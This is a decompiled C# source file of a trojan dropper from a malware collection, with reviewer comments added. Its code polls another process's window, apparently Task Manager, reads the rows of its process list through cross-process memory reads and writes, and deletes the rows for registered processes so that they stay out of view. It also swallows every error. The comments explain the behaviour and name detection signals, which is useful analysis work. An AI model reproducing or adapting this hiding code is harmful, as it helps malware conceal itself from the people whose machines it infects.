MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0005.cs
2022-08-18 06:28:56 -05:00


// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u0008;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Threading;
namespace \u0008
{
// Decompiled, name-obfuscated static helper. From the visible code: callers register a
// Process through the public \u000F(Process) overload; a background thread then polls
// every 10 ms, reads rows from a list-style child control (dialog item 1009) of another
// process's main window, and sends message 4104 for each row that matches a registered
// entry. Only window messages are sent here; nothing in this block changes how the OS
// enumerates processes, so tools that do not read that window are unaffected by it.
//
// NOTE(review): identifiers are non-printable characters rendered as \uXXXX escapes, and
// several members share the name \u0001 (a field of type \u0002, a bool, a DateTime, an
// int, and the nested class). This is decompiler output that is not expected to compile
// as-is; which member a use site means has to be read from the type it needs.
// NOTE(review): every \u0006.* call is declared in another type not shown here. The
// Win32 names suggested in the comments below are inferred from argument shapes and
// numeric constants only; confirm against the P/Invoke declarations in \u0006.
internal static class \u0005
{
// Invoked below as \u0005.\u0001(int) and used wherever a string is needed (2426, 911,
// 2439, 2504). Presumably a string-decoder delegate installed by \u0003.\u000F() in the
// static constructor; verify in \u0003. The decoded values are not visible in this file.
[NonSerialized]
internal static \u0002 \u0001;
// bool: set to true once the polling thread has been started.
private static bool \u0001;
// DateTime: last time the once-per-second message 273 was sent (see \u0010()).
private static DateTime \u0001;
// int: row count seen on the previous poll, used to detect changes in the list.
private static int \u0001;
// bool: set when a new entry is registered, forcing a rescan on the next poll.
private static bool \u0002;
// Registers a process: starts the polling thread on first use, creates an entry (the
// nested-class constructor adds itself to the shared list) and marks the state dirty.
public static void \u000F([In] Process obj0)
{
if (!\u0005.\u0001)
\u0005.\u000F();
// The local is unused; the constructor's side effect is what matters.
\u0005.\u0001 obj = new \u0005.\u0001(obj0);
\u0005.\u0002 = true;
}
// Starts a foreground thread that calls \u0010() in an endless loop with a 10 ms sleep,
// then records that it has been started. The loop has no exit condition.
// NOTE(review): a persistent 10 ms polling thread is a usable behavioural signal when
// triaging a live sample.
private static void \u000F()
{
new Thread((ThreadStart) (() =>
{
while (true)
{
\u0005.\u0010();
Thread.Sleep(10);
}
})).Start();
\u0005.\u0001 = true;
}
// One polling pass against the main window of the first process whose name is the
// decoded string 2426. All failures, including no such process being present (the [0]
// index throws), are swallowed by the empty catch at the end.
private static void \u0010()
{
try
{
IntPtr mainWindowHandle = Process.GetProcessesByName(\u0005.\u0001(2426))[0].MainWindowHandle;
// Size-prefixed struct filled by a call on the window handle; field \u0003 is compared
// with 1 and 3. Looks like WINDOWPLACEMENT.showCmd (normal / maximized); confirm.
\u0006.\u0004 structure = new \u0006.\u0004();
structure.\u0001 = Marshal.SizeOf((object) structure);
\u0006.\u000F(mainWindowHandle, ref structure);
bool flag1 = structure.\u0003 == 1 || structure.\u0003 == 3;
// num1: control with id 1009 inside the first child window returned for the main window.
IntPtr num1 = \u0006.\u000F(\u0006.\u000F(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009);
// num2..num5: handles/ids derived from the main window; the call shapes are consistent
// with menu navigation (menu -> sub-menu 2 -> sub-menu 1, item id at position 0); confirm.
IntPtr num2 = \u0006.\u000F(mainWindowHandle);
IntPtr num3 = \u0006.\u0010(num2, 2);
IntPtr num4 = \u0006.\u0010(num3, 1);
uint num5 = \u0006.\u000F(num3, 0);
if (num4 != IntPtr.Zero)
{
// 273 == 0x0111, the value of WM_COMMAND; wParam comes from position 3 under num4.
\u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) \u0006.\u000F(num4, 3), IntPtr.Zero);
\u0006.\u0010(num3, (uint) (int) num4, 1U);
}
\u0006.\u000F(num2, num5, 1U);
// Paired with the \u0006.\u000F(IntPtr.Zero) call at the end of the pass when flag1 is
// set; presumably a redraw lock/unlock on the control; confirm.
if (flag1)
\u0006.\u000F(num1);
// At most once per second, send message 273 with the item id read above.
if ((DateTime.Now - \u0005.\u0001).TotalMilliseconds > 1000.0)
{
\u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) num5, IntPtr.Zero);
\u0005.\u0001 = DateTime.Now;
}
GC.Collect();
// 4100 == 0x1004, the value of LVM_GETITEMCOUNT; the result is treated as a row count.
int num6 = (int) \u0006.\u000F(num1, 4100U, IntPtr.Zero, \u0005.\u0001(911));
// Rescan only when the row count changed or a new entry was registered.
if (num6 != \u0005.\u0001 || \u0005.\u0002)
{
\u0005.\u0002 = false;
\u0005.\u0001 = num6;
for (int index1 = 0; index1 < num6; ++index1)
{
// Read up to 10 cell texts of this row, lower-cased; stop early once a cell repeats
// the text of cell 0.
string[] strArray = new string[10];
for (int index2 = 0; index2 < 10; ++index2)
{
strArray[index2] = \u0005.\u000F(num1, index1, index2).ToLower();
if (index2 > 0 && strArray[index2] == strArray[0])
break;
}
// NOTE(review): the shared list is enumerated here without the lock that the entry
// constructor takes when adding; a concurrent add would throw and be swallowed below.
foreach (\u0005.\u0001 obj in \u0005.\u0001.\u0001)
{
// flag2: some cell starts with the entry's process name.
// flag3: some cell equals the entry's second string (from the WMI lookup).
bool flag2 = false;
bool flag3 = false;
for (int index3 = 0; index3 < 10 && strArray[index3] != null && (!flag2 || !flag3); ++index3)
{
if (strArray[index3].StartsWith(obj.\u0001))
flag2 = true;
else if (strArray[index3] == obj.\u0002)
flag3 = true;
}
if (flag2 && flag3)
{
// 4104 == 0x1008, the value of LVM_DELETEITEM. The row index is post-decremented so
// the same index is examined again on the next iteration, and the cached count drops.
\u0006.\u000F(num1, 4104U, (IntPtr) index1--, IntPtr.Zero);
--\u0005.\u0001;
break;
}
}
}
}
if (!flag1)
return;
\u0006.\u000F(IntPtr.Zero);
}
// Swallows every exception; failures of this pass leave no trace in the sample itself.
catch
{
}
}
// Returns the text of cell (obj1 = row, obj2 = column) of the control obj0, which lives
// in another process. It opens that process, allocates 1024 bytes inside it, writes a
// request struct there, sends message 4101 pointing at it, reads the 1024 bytes back
// and converts the bytes after the struct to an ANSI string.
// NOTE(review): constants match PROCESS_ALL_ACCESS (2035711 == 0x1F0FFF), MEM_COMMIT
// (4096), PAGE_READWRITE (4), LVM_GETITEMA (4101 == 0x1005) and MEM_RELEASE (32768);
// the call sequence looks like OpenProcess / VirtualAllocEx / WriteProcessMemory /
// SendMessage / ReadProcessMemory / VirtualFreeEx / CloseHandle; confirm in \u0006.
// NOTE(review): if so, this runs once per cell per rescan, and a full-access handle
// open on a GUI process followed by remote allocate/write/read is visible to
// process-access telemetry (for example Sysmon ProcessAccess events record the mask).
// NOTE(review): pointers are narrowed through (int) before arithmetic, which suggests
// the author assumed a 32-bit address space. None of the buffers or handles are
// released if a call throws part-way through.
private static string \u000F([In] IntPtr obj0, [In] int obj1, [In] int obj2)
{
\u0006.\u0001 obj = new \u0006.\u0001();
IntPtr hglobal = Marshal.AllocHGlobal(1024);
uint lpdwProcessId;
int num1 = (int) \u0006.\u000F(obj0, out lpdwProcessId);
IntPtr num2 = \u0006.\u000F(2035711U, false, (int) lpdwProcessId);
IntPtr num3 = \u0006.\u000F(num2, IntPtr.Zero, 1024U, 4096U, 4U);
// Request struct: a uint flag of 1, row, column, a text pointer placed directly after
// the struct inside the remote buffer, and a length of 50. The three \u0001 assignments
// target different same-named fields (uint, int, IntPtr).
obj.\u0001 = 1U;
obj.\u0001 = obj1;
obj.\u0002 = obj2;
obj.\u0001 = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (\u0006.\u0001)));
obj.\u0003 = 50;
\u0006.\u000F(num2, num3, ref obj, Marshal.SizeOf(typeof (\u0006.\u0001)), 0);
\u0006.\u000F(obj0, 4101U, IntPtr.Zero, num3);
\u0006.\u000F(num2, num3, hglobal, 1024, 0);
string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) hglobal + Marshal.SizeOf(typeof (\u0006.\u0001))));
Marshal.FreeHGlobal(hglobal);
\u0006.\u000F(num2, num3, 0, 32768U);
\u0006.\u0010(num2);
return stringAnsi;
}
// Runs a WMI query built from the decoded string 2439 plus the process id, invokes the
// method named by decoded string 2504 on each result, and returns the first argument
// slot when the method returns 0; otherwise returns decoded string 911.
// NOTE(review): the shape is consistent with Win32_Process.GetOwner returning the
// account name, with 911 presumably the empty string; confirm by decoding the strings.
// The searcher and result objects are never disposed.
private static string \u000F([In] Process obj0)
{
foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0005.\u0001(2439) + (object) obj0.Id).Get())
{
string[] args = new string[1]{ \u0005.\u0001(911) };
if (Convert.ToInt32(managementObject.InvokeMethod(\u0005.\u0001(2504), (object[]) args)) == 0)
return args[0];
}
return \u0005.\u0001(911);
}
// Type initializer: calls \u0003.\u000F() (defined elsewhere; presumably sets up the
// string-decoder field, verify) and seeds the once-per-second timestamp.
static \u0005()
{
\u0003.\u000F();
\u0005.\u0001 = DateTime.Now;
}
// One registered process: its lower-cased name and the lower-cased string returned by
// the WMI lookup above. Instances add themselves to the shared static list.
private sealed class \u0001
{
// Shared registry of entries; also used as the lock object when adding.
public static List<\u0005.\u0001> \u0001 = new List<\u0005.\u0001>();
// Lower-cased Process.ProcessName; matched as a prefix against cell text.
public string \u0001;
// Lower-cased result of \u0005.\u000F(Process); matched for equality against cell text.
public string \u0002;
public \u0001([In] Process obj0)
{
this.\u0001 = obj0.ProcessName.ToLower();
this.\u0002 = \u0005.\u000F(obj0).ToLower();
lock (\u0005.\u0001.\u0001)
\u0005.\u0001.\u0001.Add(this);
}
}
}
}